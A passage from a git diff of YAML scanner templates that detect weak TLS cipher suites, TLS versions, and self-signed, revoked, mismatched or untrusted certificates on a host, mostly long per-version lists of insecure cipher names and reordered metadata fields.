"TLS_DH_anon_WITH_DES_CBC_SHA" - - "TLS_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA" - - "TLS_DH_anon_WITH_SEED_CBC_SHA" - - "TLS_DH_anon_WITH_AES_256_CBC_SHA256" - - "TLS_DHE_DSS_WITH_DES_CBC_SHA" - - "TLS_PSK_WITH_NULL_SHA256" - - "TLS_ECDH_ECDSA_WITH_RC4_128_SHA" - - "TLS_ECDH_anon_WITH_AES_128_CBC_SHA" - - "TLS_ECDHE_PSK_WITH_NULL_SHA" - - "TLS_ECDH_anon_WITH_NULL_SHA" - - "TLS_ECDH_anon_WITH_AES_256_CBC_SHA" - - "TLS_KRB5_WITH_IDEA_CBC_MD5" - - "TLS_GOSTR341112_256_WITH_KUZNYECHIK_CTR_OMAC" - - "TLS_ECDHE_RSA_WITH_NULL_SHA" - - "TLS_GOSTR341112_256_WITH_28147_CNT_IMIT" - - "TLS_RSA_PSK_WITH_NULL_SHA" - - "TLS_DH_RSA_EXPORT_WITH_DES40_CBC_SHA" - - "TLS_KRB5_WITH_DES_CBC_MD5" - - "TLS_KRB5_EXPORT_WITH_RC4_40_SHA" - - "TLS_DH_anon_WITH_ARIA_128_GCM_SHA256" - - "TLS_SM4_GCM_SM3" - - "TLS_ECDHE_PSK_WITH_NULL_SHA384" - - "TLS_ECDHE_ECDSA_WITH_RC4_128_SHA" - - "TLS_ECDH_anon_WITH_3DES_EDE_CBC_SHA" - - "TLS_KRB5_EXPORT_WITH_RC4_40_MD5" - - "TLS_DH_anon_WITH_3DES_EDE_CBC_SHA" - - "TLS_RSA_PSK_WITH_NULL_SHA256" - - "TLS_ECDHE_PSK_WITH_NULL_SHA256" - - "TLS_RSA_EXPORT_WITH_RC2_CBC_40_MD5" - - "TLS_DH_RSA_WITH_DES_CBC_SHA" - - "TLS_ECDHE_RSA_WITH_RC4_128_SHA" - - "TLS_ECDH_anon_WITH_RC4_128_SHA" - - "TLS_DHE_DSS_EXPORT_WITH_DES40_CBC_SHA" - - "TLS_DHE_RSA_WITH_DES_CBC_SHA" - - "TLS_RSA_WITH_RC4_128_SHA" - - "TLS_KRB5_EXPORT_WITH_RC2_CBC_40_MD5" - - "TLS_DH_anon_WITH_AES_128_CBC_SHA256" - - "TLS_DH_anon_WITH_CAMELLIA_128_GCM_SHA256" - - "TLS_ECDH_ECDSA_WITH_NULL_SHA" - - "TLS_RSA_PSK_WITH_NULL_SHA384" - - "TLS_KRB5_WITH_3DES_EDE_CBC_MD5" - - "TLS_KRB5_WITH_RC4_128_SHA" - - "TLS_RSA_WITH_NULL_SHA" - condition: or +ssl: + - address: "{{Host}}:{{Port}}" + min_version: tls10 + max_version: tls10 + + extractors: + - type: dsl + dsl: + - "tls_version, cipher" + matchers: + - type: word + part: cipher + words: + - "TLS_DHE_PSK_WITH_NULL_SHA384" + - "TLS_DH_anon_WITH_CAMELLIA_128_CBC_SHA" + - "TLS_DH_anon_WITH_AES_128_GCM_SHA256" + - "TLS_NULL_WITH_NULL_NULL" + - "TLS_DH_DSS_WITH_DES_CBC_SHA" + - "TLS_ECDH_RSA_WITH_NULL_SHA" + - "TLS_DH_anon_EXPORT_WITH_RC4_40_MD5" + - "TLS_DH_anon_WITH_AES_256_CBC_SHA" + - "TLS_DH_anon_WITH_ARIA_128_CBC_SHA256" + - "TLS_RSA_WITH_RC4_128_MD5" + - "TLS_SM4_CCM_SM3" + - "TLS_DH_anon_WITH_CAMELLIA_256_GCM_SHA384" + - "TLS_RSA_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_ECDH_RSA_WITH_RC4_128_SHA" + - "TLS_KRB5_EXPORT_WITH_DES_CBC_40_MD5" + - "TLS_RSA_PSK_WITH_RC4_128_SHA" + - "TLS_GOSTR341112_256_WITH_MAGMA_CTR_OMAC" + - "TLS_DH_anon_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_DH_anon_WITH_ARIA_256_GCM_SHA384" + - "TLS_DHE_PSK_WITH_NULL_SHA256" + - "TLS_ECDHE_PSK_WITH_RC4_128_SHA" + - "TLS_PSK_WITH_RC4_128_SHA" + - "TLS_DHE_PSK_WITH_RC4_128_SHA" + - "TLS_KRB5_WITH_DES_CBC_SHA" + - "TLS_DH_anon_WITH_CAMELLIA_256_CBC_SHA" + - "TLS_DH_anon_WITH_CAMELLIA_256_CBC_SHA256" + - "TLS_PSK_WITH_NULL_SHA" + - "TLS_RSA_EXPORT_WITH_RC4_40_MD5" + - "TLS_DH_anon_WITH_RC4_128_MD5" + - "TLS_ECDHE_ECDSA_WITH_NULL_SHA" + - "TLS_DH_anon_WITH_CAMELLIA_128_CBC_SHA256" + - "TLS_RSA_WITH_NULL_MD5" + - "TLS_SHA384_SHA384" + - "TLS_SHA256_SHA256" + - "TLS_DH_anon_WITH_AES_256_GCM_SHA384" + - "TLS_RSA_WITH_NULL_SHA256" + - "TLS_KRB5_EXPORT_WITH_DES_CBC_40_SHA" + - "TLS_RSA_WITH_DES_CBC_SHA" + - "TLS_KRB5_EXPORT_WITH_RC2_CBC_40_SHA" + - "TLS_PSK_WITH_NULL_SHA384" + - "TLS_DH_DSS_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_KRB5_WITH_RC4_128_MD5" + - "TLS_DH_anon_WITH_AES_128_CBC_SHA" + - "TLS_DHE_PSK_WITH_NULL_SHA" + - "TLS_DH_anon_WITH_ARIA_256_CBC_SHA384" + - "TLS_DH_anon_WITH_DES_CBC_SHA" + - "TLS_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_DH_anon_WITH_SEED_CBC_SHA" + - "TLS_DH_anon_WITH_AES_256_CBC_SHA256" + - "TLS_DHE_DSS_WITH_DES_CBC_SHA" + - "TLS_PSK_WITH_NULL_SHA256" + - "TLS_ECDH_ECDSA_WITH_RC4_128_SHA" + - "TLS_ECDH_anon_WITH_AES_128_CBC_SHA" + - "TLS_ECDHE_PSK_WITH_NULL_SHA" + - "TLS_ECDH_anon_WITH_NULL_SHA" + - "TLS_ECDH_anon_WITH_AES_256_CBC_SHA" + - "TLS_KRB5_WITH_IDEA_CBC_MD5" + - "TLS_GOSTR341112_256_WITH_KUZNYECHIK_CTR_OMAC" + - "TLS_ECDHE_RSA_WITH_NULL_SHA" + - "TLS_GOSTR341112_256_WITH_28147_CNT_IMIT" + - "TLS_RSA_PSK_WITH_NULL_SHA" + - "TLS_DH_RSA_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_KRB5_WITH_DES_CBC_MD5" + - "TLS_KRB5_EXPORT_WITH_RC4_40_SHA" + - "TLS_DH_anon_WITH_ARIA_128_GCM_SHA256" + - "TLS_SM4_GCM_SM3" + - "TLS_ECDHE_PSK_WITH_NULL_SHA384" + - "TLS_ECDHE_ECDSA_WITH_RC4_128_SHA" + - "TLS_ECDH_anon_WITH_3DES_EDE_CBC_SHA" + - "TLS_KRB5_EXPORT_WITH_RC4_40_MD5" + - "TLS_DH_anon_WITH_3DES_EDE_CBC_SHA" + - "TLS_RSA_PSK_WITH_NULL_SHA256" + - "TLS_ECDHE_PSK_WITH_NULL_SHA256" + - "TLS_RSA_EXPORT_WITH_RC2_CBC_40_MD5" + - "TLS_DH_RSA_WITH_DES_CBC_SHA" + - "TLS_ECDHE_RSA_WITH_RC4_128_SHA" + - "TLS_ECDH_anon_WITH_RC4_128_SHA" + - "TLS_DHE_DSS_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_DHE_RSA_WITH_DES_CBC_SHA" + - "TLS_RSA_WITH_RC4_128_SHA" + - "TLS_KRB5_EXPORT_WITH_RC2_CBC_40_MD5" + - "TLS_DH_anon_WITH_AES_128_CBC_SHA256" + - "TLS_DH_anon_WITH_CAMELLIA_128_GCM_SHA256" + - "TLS_ECDH_ECDSA_WITH_NULL_SHA" + - "TLS_RSA_PSK_WITH_NULL_SHA384" + - "TLS_KRB5_WITH_3DES_EDE_CBC_MD5" + - "TLS_KRB5_WITH_RC4_128_SHA" + - "TLS_RSA_WITH_NULL_SHA" + condition: or + + - address: "{{Host}}:{{Port}}" + min_version: tls11 + max_version: tls11 + + extractors: + - type: dsl + dsl: + - "tls_version, cipher" + matchers: + - type: word + part: cipher + words: + - "TLS_DHE_PSK_WITH_NULL_SHA384" + - "TLS_DH_anon_WITH_CAMELLIA_128_CBC_SHA" + - "TLS_DH_anon_WITH_AES_128_GCM_SHA256" + - "TLS_NULL_WITH_NULL_NULL" + - "TLS_DH_DSS_WITH_DES_CBC_SHA" + - "TLS_ECDH_RSA_WITH_NULL_SHA" + - "TLS_DH_anon_EXPORT_WITH_RC4_40_MD5" + - "TLS_DH_anon_WITH_AES_256_CBC_SHA" + - "TLS_DH_anon_WITH_ARIA_128_CBC_SHA256" + - "TLS_RSA_WITH_RC4_128_MD5" + - "TLS_SM4_CCM_SM3" + - "TLS_DH_anon_WITH_CAMELLIA_256_GCM_SHA384" + - "TLS_RSA_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_ECDH_RSA_WITH_RC4_128_SHA" + - "TLS_KRB5_EXPORT_WITH_DES_CBC_40_MD5" + - "TLS_RSA_PSK_WITH_RC4_128_SHA" + - "TLS_GOSTR341112_256_WITH_MAGMA_CTR_OMAC" + - "TLS_DH_anon_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_DH_anon_WITH_ARIA_256_GCM_SHA384" + - "TLS_DHE_PSK_WITH_NULL_SHA256" + - "TLS_ECDHE_PSK_WITH_RC4_128_SHA" + - "TLS_PSK_WITH_RC4_128_SHA" + - "TLS_DHE_PSK_WITH_RC4_128_SHA" + - "TLS_KRB5_WITH_DES_CBC_SHA" + - "TLS_DH_anon_WITH_CAMELLIA_256_CBC_SHA" + - "TLS_DH_anon_WITH_CAMELLIA_256_CBC_SHA256" + - "TLS_PSK_WITH_NULL_SHA" + - "TLS_RSA_EXPORT_WITH_RC4_40_MD5" + - "TLS_DH_anon_WITH_RC4_128_MD5" + - "TLS_ECDHE_ECDSA_WITH_NULL_SHA" + - "TLS_DH_anon_WITH_CAMELLIA_128_CBC_SHA256" + - "TLS_RSA_WITH_NULL_MD5" + - "TLS_SHA384_SHA384" + - "TLS_SHA256_SHA256" + - "TLS_DH_anon_WITH_AES_256_GCM_SHA384" + - "TLS_RSA_WITH_NULL_SHA256" + - "TLS_KRB5_EXPORT_WITH_DES_CBC_40_SHA" + - "TLS_RSA_WITH_DES_CBC_SHA" + - "TLS_KRB5_EXPORT_WITH_RC2_CBC_40_SHA" + - "TLS_PSK_WITH_NULL_SHA384" + - "TLS_DH_DSS_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_KRB5_WITH_RC4_128_MD5" + - "TLS_DH_anon_WITH_AES_128_CBC_SHA" + - "TLS_DHE_PSK_WITH_NULL_SHA" + - "TLS_DH_anon_WITH_ARIA_256_CBC_SHA384" + - "TLS_DH_anon_WITH_DES_CBC_SHA" + - "TLS_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_DH_anon_WITH_SEED_CBC_SHA" + - "TLS_DH_anon_WITH_AES_256_CBC_SHA256" + - "TLS_DHE_DSS_WITH_DES_CBC_SHA" + - "TLS_PSK_WITH_NULL_SHA256" + - "TLS_ECDH_ECDSA_WITH_RC4_128_SHA" + - "TLS_ECDH_anon_WITH_AES_128_CBC_SHA" + - "TLS_ECDHE_PSK_WITH_NULL_SHA" + - "TLS_ECDH_anon_WITH_NULL_SHA" + - "TLS_ECDH_anon_WITH_AES_256_CBC_SHA" + - "TLS_KRB5_WITH_IDEA_CBC_MD5" + - "TLS_GOSTR341112_256_WITH_KUZNYECHIK_CTR_OMAC" + - "TLS_ECDHE_RSA_WITH_NULL_SHA" + - "TLS_GOSTR341112_256_WITH_28147_CNT_IMIT" + - "TLS_RSA_PSK_WITH_NULL_SHA" + - "TLS_DH_RSA_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_KRB5_WITH_DES_CBC_MD5" + - "TLS_KRB5_EXPORT_WITH_RC4_40_SHA" + - "TLS_DH_anon_WITH_ARIA_128_GCM_SHA256" + - "TLS_SM4_GCM_SM3" + - "TLS_ECDHE_PSK_WITH_NULL_SHA384" + - "TLS_ECDHE_ECDSA_WITH_RC4_128_SHA" + - "TLS_ECDH_anon_WITH_3DES_EDE_CBC_SHA" + - "TLS_KRB5_EXPORT_WITH_RC4_40_MD5" + - "TLS_DH_anon_WITH_3DES_EDE_CBC_SHA" + - "TLS_RSA_PSK_WITH_NULL_SHA256" + - "TLS_ECDHE_PSK_WITH_NULL_SHA256" + - "TLS_RSA_EXPORT_WITH_RC2_CBC_40_MD5" + - "TLS_DH_RSA_WITH_DES_CBC_SHA" + - "TLS_ECDHE_RSA_WITH_RC4_128_SHA" + - "TLS_ECDH_anon_WITH_RC4_128_SHA" + - "TLS_DHE_DSS_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_DHE_RSA_WITH_DES_CBC_SHA" + - "TLS_RSA_WITH_RC4_128_SHA" + - "TLS_KRB5_EXPORT_WITH_RC2_CBC_40_MD5" + - "TLS_DH_anon_WITH_AES_128_CBC_SHA256" + - "TLS_DH_anon_WITH_CAMELLIA_128_GCM_SHA256" + - "TLS_ECDH_ECDSA_WITH_NULL_SHA" + - "TLS_RSA_PSK_WITH_NULL_SHA384" + - "TLS_KRB5_WITH_3DES_EDE_CBC_MD5" + - "TLS_KRB5_WITH_RC4_128_SHA" + - "TLS_RSA_WITH_NULL_SHA" + condition: or + + - address: "{{Host}}:{{Port}}" + min_version: tls12 + max_version: tls12 + + extractors: + - type: dsl + dsl: + - "tls_version, cipher" + matchers: + - type: word + part: cipher + words: + - "TLS_DHE_PSK_WITH_NULL_SHA384" + - "TLS_DH_anon_WITH_CAMELLIA_128_CBC_SHA" + - "TLS_DH_anon_WITH_AES_128_GCM_SHA256" + - "TLS_NULL_WITH_NULL_NULL" + - "TLS_DH_DSS_WITH_DES_CBC_SHA" + - "TLS_ECDH_RSA_WITH_NULL_SHA" + - "TLS_DH_anon_EXPORT_WITH_RC4_40_MD5" + - "TLS_DH_anon_WITH_AES_256_CBC_SHA" + - "TLS_DH_anon_WITH_ARIA_128_CBC_SHA256" + - "TLS_RSA_WITH_RC4_128_MD5" + - "TLS_SM4_CCM_SM3" + - "TLS_DH_anon_WITH_CAMELLIA_256_GCM_SHA384" + - "TLS_RSA_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_ECDH_RSA_WITH_RC4_128_SHA" + - "TLS_KRB5_EXPORT_WITH_DES_CBC_40_MD5" + - "TLS_RSA_PSK_WITH_RC4_128_SHA" + - "TLS_GOSTR341112_256_WITH_MAGMA_CTR_OMAC" + - "TLS_DH_anon_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_DH_anon_WITH_ARIA_256_GCM_SHA384" + - "TLS_DHE_PSK_WITH_NULL_SHA256" + - "TLS_ECDHE_PSK_WITH_RC4_128_SHA" + - "TLS_PSK_WITH_RC4_128_SHA" + - "TLS_DHE_PSK_WITH_RC4_128_SHA" + - "TLS_KRB5_WITH_DES_CBC_SHA" + - "TLS_DH_anon_WITH_CAMELLIA_256_CBC_SHA" + - "TLS_DH_anon_WITH_CAMELLIA_256_CBC_SHA256" + - "TLS_PSK_WITH_NULL_SHA" + - "TLS_RSA_EXPORT_WITH_RC4_40_MD5" + - "TLS_DH_anon_WITH_RC4_128_MD5" + - "TLS_ECDHE_ECDSA_WITH_NULL_SHA" + - "TLS_DH_anon_WITH_CAMELLIA_128_CBC_SHA256" + - "TLS_RSA_WITH_NULL_MD5" + - "TLS_SHA384_SHA384" + - "TLS_SHA256_SHA256" + - "TLS_DH_anon_WITH_AES_256_GCM_SHA384" + - "TLS_RSA_WITH_NULL_SHA256" + - "TLS_KRB5_EXPORT_WITH_DES_CBC_40_SHA" + - "TLS_RSA_WITH_DES_CBC_SHA" + - "TLS_KRB5_EXPORT_WITH_RC2_CBC_40_SHA" + - "TLS_PSK_WITH_NULL_SHA384" + - "TLS_DH_DSS_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_KRB5_WITH_RC4_128_MD5" + - "TLS_DH_anon_WITH_AES_128_CBC_SHA" + - "TLS_DHE_PSK_WITH_NULL_SHA" + - "TLS_DH_anon_WITH_ARIA_256_CBC_SHA384" + - "TLS_DH_anon_WITH_DES_CBC_SHA" + - "TLS_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_DH_anon_WITH_SEED_CBC_SHA" + - "TLS_DH_anon_WITH_AES_256_CBC_SHA256" + - "TLS_DHE_DSS_WITH_DES_CBC_SHA" + - "TLS_PSK_WITH_NULL_SHA256" + - "TLS_ECDH_ECDSA_WITH_RC4_128_SHA" + - "TLS_ECDH_anon_WITH_AES_128_CBC_SHA" + - "TLS_ECDHE_PSK_WITH_NULL_SHA" + - "TLS_ECDH_anon_WITH_NULL_SHA" + - "TLS_ECDH_anon_WITH_AES_256_CBC_SHA" + - "TLS_KRB5_WITH_IDEA_CBC_MD5" + - "TLS_GOSTR341112_256_WITH_KUZNYECHIK_CTR_OMAC" + - "TLS_ECDHE_RSA_WITH_NULL_SHA" + - "TLS_GOSTR341112_256_WITH_28147_CNT_IMIT" + - "TLS_RSA_PSK_WITH_NULL_SHA" + - "TLS_DH_RSA_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_KRB5_WITH_DES_CBC_MD5" + - "TLS_KRB5_EXPORT_WITH_RC4_40_SHA" + - "TLS_DH_anon_WITH_ARIA_128_GCM_SHA256" + - "TLS_SM4_GCM_SM3" + - "TLS_ECDHE_PSK_WITH_NULL_SHA384" + - "TLS_ECDHE_ECDSA_WITH_RC4_128_SHA" + - "TLS_ECDH_anon_WITH_3DES_EDE_CBC_SHA" + - "TLS_KRB5_EXPORT_WITH_RC4_40_MD5" + - "TLS_DH_anon_WITH_3DES_EDE_CBC_SHA" + - "TLS_RSA_PSK_WITH_NULL_SHA256" + - "TLS_ECDHE_PSK_WITH_NULL_SHA256" + - "TLS_RSA_EXPORT_WITH_RC2_CBC_40_MD5" + - "TLS_DH_RSA_WITH_DES_CBC_SHA" + - "TLS_ECDHE_RSA_WITH_RC4_128_SHA" + - "TLS_ECDH_anon_WITH_RC4_128_SHA" + - "TLS_DHE_DSS_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_DHE_RSA_WITH_DES_CBC_SHA" + - "TLS_RSA_WITH_RC4_128_SHA" + - "TLS_KRB5_EXPORT_WITH_RC2_CBC_40_MD5" + - "TLS_DH_anon_WITH_AES_128_CBC_SHA256" + - "TLS_DH_anon_WITH_CAMELLIA_128_GCM_SHA256" + - "TLS_ECDH_ECDSA_WITH_NULL_SHA" + - "TLS_RSA_PSK_WITH_NULL_SHA384" + - "TLS_KRB5_WITH_3DES_EDE_CBC_MD5" + - "TLS_KRB5_WITH_RC4_128_SHA" + - "TLS_RSA_WITH_NULL_SHA" + condition: or + + - address: "{{Host}}:{{Port}}" + min_version: tls13 + max_version: tls13 + + extractors: + - type: dsl + dsl: + - "tls_version, cipher" + matchers: + - type: word + part: cipher + words: + - "TLS_DHE_PSK_WITH_NULL_SHA384" + - "TLS_DH_anon_WITH_CAMELLIA_128_CBC_SHA" + - "TLS_DH_anon_WITH_AES_128_GCM_SHA256" + - "TLS_NULL_WITH_NULL_NULL" + - "TLS_DH_DSS_WITH_DES_CBC_SHA" + - "TLS_ECDH_RSA_WITH_NULL_SHA" + - "TLS_DH_anon_EXPORT_WITH_RC4_40_MD5" + - "TLS_DH_anon_WITH_AES_256_CBC_SHA" + - "TLS_DH_anon_WITH_ARIA_128_CBC_SHA256" + - "TLS_RSA_WITH_RC4_128_MD5" + - "TLS_SM4_CCM_SM3" + - "TLS_DH_anon_WITH_CAMELLIA_256_GCM_SHA384" + - "TLS_RSA_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_ECDH_RSA_WITH_RC4_128_SHA" + - "TLS_KRB5_EXPORT_WITH_DES_CBC_40_MD5" + - "TLS_RSA_PSK_WITH_RC4_128_SHA" + - "TLS_GOSTR341112_256_WITH_MAGMA_CTR_OMAC" + - "TLS_DH_anon_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_DH_anon_WITH_ARIA_256_GCM_SHA384" + - "TLS_DHE_PSK_WITH_NULL_SHA256" + - "TLS_ECDHE_PSK_WITH_RC4_128_SHA" + - "TLS_PSK_WITH_RC4_128_SHA" + - "TLS_DHE_PSK_WITH_RC4_128_SHA" + - "TLS_KRB5_WITH_DES_CBC_SHA" + - "TLS_DH_anon_WITH_CAMELLIA_256_CBC_SHA" + - "TLS_DH_anon_WITH_CAMELLIA_256_CBC_SHA256" + - "TLS_PSK_WITH_NULL_SHA" + - "TLS_RSA_EXPORT_WITH_RC4_40_MD5" + - "TLS_DH_anon_WITH_RC4_128_MD5" + - "TLS_ECDHE_ECDSA_WITH_NULL_SHA" + - "TLS_DH_anon_WITH_CAMELLIA_128_CBC_SHA256" + - "TLS_RSA_WITH_NULL_MD5" + - "TLS_SHA384_SHA384" + - "TLS_SHA256_SHA256" + - "TLS_DH_anon_WITH_AES_256_GCM_SHA384" + - "TLS_RSA_WITH_NULL_SHA256" + - "TLS_KRB5_EXPORT_WITH_DES_CBC_40_SHA" + - "TLS_RSA_WITH_DES_CBC_SHA" + - "TLS_KRB5_EXPORT_WITH_RC2_CBC_40_SHA" + - "TLS_PSK_WITH_NULL_SHA384" + - "TLS_DH_DSS_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_KRB5_WITH_RC4_128_MD5" + - "TLS_DH_anon_WITH_AES_128_CBC_SHA" + - "TLS_DHE_PSK_WITH_NULL_SHA" + - "TLS_DH_anon_WITH_ARIA_256_CBC_SHA384" + - "TLS_DH_anon_WITH_DES_CBC_SHA" + - "TLS_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_DH_anon_WITH_SEED_CBC_SHA" + - "TLS_DH_anon_WITH_AES_256_CBC_SHA256" + - "TLS_DHE_DSS_WITH_DES_CBC_SHA" + - "TLS_PSK_WITH_NULL_SHA256" + - "TLS_ECDH_ECDSA_WITH_RC4_128_SHA" + - "TLS_ECDH_anon_WITH_AES_128_CBC_SHA" + - "TLS_ECDHE_PSK_WITH_NULL_SHA" + - "TLS_ECDH_anon_WITH_NULL_SHA" + - "TLS_ECDH_anon_WITH_AES_256_CBC_SHA" + - "TLS_KRB5_WITH_IDEA_CBC_MD5" + - "TLS_GOSTR341112_256_WITH_KUZNYECHIK_CTR_OMAC" + - "TLS_ECDHE_RSA_WITH_NULL_SHA" + - "TLS_GOSTR341112_256_WITH_28147_CNT_IMIT" + - "TLS_RSA_PSK_WITH_NULL_SHA" + - "TLS_DH_RSA_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_KRB5_WITH_DES_CBC_MD5" + - "TLS_KRB5_EXPORT_WITH_RC4_40_SHA" + - "TLS_DH_anon_WITH_ARIA_128_GCM_SHA256" + - "TLS_SM4_GCM_SM3" + - "TLS_ECDHE_PSK_WITH_NULL_SHA384" + - "TLS_ECDHE_ECDSA_WITH_RC4_128_SHA" + - "TLS_ECDH_anon_WITH_3DES_EDE_CBC_SHA" + - "TLS_KRB5_EXPORT_WITH_RC4_40_MD5" + - "TLS_DH_anon_WITH_3DES_EDE_CBC_SHA" + - "TLS_RSA_PSK_WITH_NULL_SHA256" + - "TLS_ECDHE_PSK_WITH_NULL_SHA256" + - "TLS_RSA_EXPORT_WITH_RC2_CBC_40_MD5" + - "TLS_DH_RSA_WITH_DES_CBC_SHA" + - "TLS_ECDHE_RSA_WITH_RC4_128_SHA" + - "TLS_ECDH_anon_WITH_RC4_128_SHA" + - "TLS_DHE_DSS_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_DHE_RSA_WITH_DES_CBC_SHA" + - "TLS_RSA_WITH_RC4_128_SHA" + - "TLS_KRB5_EXPORT_WITH_RC2_CBC_40_MD5" + - "TLS_DH_anon_WITH_AES_128_CBC_SHA256" + - "TLS_DH_anon_WITH_CAMELLIA_128_GCM_SHA256" + - "TLS_ECDH_ECDSA_WITH_NULL_SHA" + - "TLS_RSA_PSK_WITH_NULL_SHA384" + - "TLS_KRB5_WITH_3DES_EDE_CBC_MD5" + - "TLS_KRB5_WITH_RC4_128_SHA" + - "TLS_RSA_WITH_NULL_SHA" + condition: or diff --git a/ssl/kubernetes-fake-certificate.yaml b/ssl/kubernetes-fake-certificate.yaml index 42339c74da..85769011a9 100644 --- a/ssl/kubernetes-fake-certificate.yaml +++ b/ssl/kubernetes-fake-certificate.yaml @@ -10,14 +10,12 @@ info: reference: - https://snyk.io/blog/setting-up-ssl-tls-for-kubernetes-ingress/ metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: ssl:"Kubernetes Ingress Controller Fake Certificate" tags: ssl,kubernetes,tls,self-signed - ssl: - address: "{{Host}}:{{Port}}" - matchers: - type: dsl dsl: diff --git a/ssl/mismatched-ssl-certificate.yaml b/ssl/mismatched-ssl-certificate.yaml index bf18aeace0..8b6a4c8f06 100644 --- a/ssl/mismatched-ssl-certificate.yaml +++ b/ssl/mismatched-ssl-certificate.yaml @@ -4,17 +4,15 @@ info: name: Mismatched SSL Certificate author: pdteam severity: low - reference: - - https://www.invicti.com/web-vulnerability-scanner/vulnerabilities/ssl-certificate-name-hostname-mismatch/ description: | Mismatched certificates occur when there is inconsistency between the common name to which the certificate was issued and the domain name in the URL. This issue impacts the trust value of the affected website. - tags: ssl,mismatched,tls + reference: + - https://www.invicti.com/web-vulnerability-scanner/vulnerabilities/ssl-certificate-name-hostname-mismatch/ metadata: max-request: 1 - + tags: ssl,mismatched,tls ssl: - address: "{{Host}}:{{Port}}" - matchers: - type: dsl dsl: @@ -25,4 +23,4 @@ ssl: extractors: - type: dsl dsl: - - '"CN: " + subject_cn' \ No newline at end of file + - '"CN: " + subject_cn' diff --git a/ssl/revoked-ssl-certificate.yaml b/ssl/revoked-ssl-certificate.yaml index 82c7cae0eb..88d84e7b12 100644 --- a/ssl/revoked-ssl-certificate.yaml +++ b/ssl/revoked-ssl-certificate.yaml @@ -5,17 +5,15 @@ info: author: pussycat0x severity: low description: | - Certificate revocation is the act of invalidating a TLS/SSL before its scheduled expiration date. A certificate should be revoked immediately when its private key shows signs of being compromised. It should also be revoked when the domain for which it was issued is no longer operational. + Certificate revocation is the act of invalidating a TLS/SSL before its scheduled expiration date. A certificate should be revoked immediately when its private key shows signs of being compromised. It should also be revoked when the domain for which it was issued is no longer operational. reference: | - https://www.invicti.com/web-vulnerability-scanner/vulnerabilities/revoked-ssl-certificate/ - https://www.tenable.com/plugins/nnm/5837 - tags: ssl,revoked metadata: max-request: 1 - + tags: ssl,revoked ssl: - address: "{{Host}}:{{Port}}" - matchers: - type: dsl dsl: diff --git a/ssl/self-signed-ssl.yaml b/ssl/self-signed-ssl.yaml index ab9d5a0555..2e7916010e 100644 --- a/ssl/self-signed-ssl.yaml +++ b/ssl/self-signed-ssl.yaml @@ -4,20 +4,18 @@ info: name: Self Signed SSL Certificate author: righettod,pdteam severity: low - reference: - - https://www.rapid7.com/db/vulnerabilities/ssl-self-signed-certificate/ description: | self-signed certificates are public key certificates that are not issued by a certificate authority. These self-signed certificates are easy to make and do not cost money. However, they do not provide any trust value. remediation: | Purchase or generate a proper SSL certificate for this service. - tags: ssl + reference: + - https://www.rapid7.com/db/vulnerabilities/ssl-self-signed-certificate/ metadata: max-request: 1 - + tags: ssl ssl: - address: "{{Host}}:{{Port}}" - matchers: - type: dsl dsl: diff --git a/ssl/ssl-dns-names.yaml b/ssl/ssl-dns-names.yaml index 3fa46592ad..04f039973e 100644 --- a/ssl/ssl-dns-names.yaml +++ b/ssl/ssl-dns-names.yaml @@ -6,14 +6,13 @@ info: severity: info description: | Extract the Subject Alternative Name (SAN) from the target's certificate. SAN facilitates the usage of additional hostnames with the same certificate. - tags: ssl metadata: max-request: 1 - + tags: ssl ssl: - address: "{{Host}}:{{Port}}" extractors: - type: json json: - - ".subject_an[]" \ No newline at end of file + - ".subject_an[]" diff --git a/ssl/tls-version.yaml b/ssl/tls-version.yaml index ac189354ac..599cf99da2 100644 --- a/ssl/tls-version.yaml +++ b/ssl/tls-version.yaml @@ -7,10 +7,9 @@ info: description: | TLS version detection is a security process used to determine the version of the Transport Layer Security (TLS) protocol used by a computer or server. It is important to detect the TLS version in order to ensure secure communication between two computers or servers. - tags: ssl metadata: max-request: 4 - + tags: ssl ssl: - address: "{{Host}}:{{Port}}" min_version: tls10 diff --git a/ssl/untrusted-root-certificate.yaml b/ssl/untrusted-root-certificate.yaml index 8bcbbce446..614939b681 100644 --- a/ssl/untrusted-root-certificate.yaml +++ b/ssl/untrusted-root-certificate.yaml @@ -5,18 +5,16 @@ info: author: pussycat0x severity: low description: | - A root certificate is a digital certificate issued by a trusted certificate authority that acts as a basis for other digital certificates. An untrusted root certificate is a certificate that is issued by an authority that is not trusted by the computer, and therefore cannot be used to authenticate websites or other digital certificates. + A root certificate is a digital certificate issued by a trusted certificate authority that acts as a basis for other digital certificates. An untrusted root certificate is a certificate that is issued by an authority that is not trusted by the computer, and therefore cannot be used to authenticate websites or other digital certificates. reference: - https://www.sslmarket.com/ssl/trusted-and-untrusted-certificate - https://www.invicti.com/web-vulnerability-scanner/vulnerabilities/ssl-untrusted-root-certificate/ metadata: - max-request: 1 verified: true + max-request: 1 tags: ssl,untrusted - ssl: - address: "{{Host}}:{{Port}}" - matchers: - type: dsl dsl: diff --git a/ssl/weak-cipher-suites.yaml b/ssl/weak-cipher-suites.yaml index be5b7869f6..30ce1f13a1 100644 --- a/ssl/weak-cipher-suites.yaml +++ b/ssl/weak-cipher-suites.yaml @@ -4,16 +4,13 @@ info: name: Weak Cipher Suites Detection author: pussycat0x severity: low + description: A weak 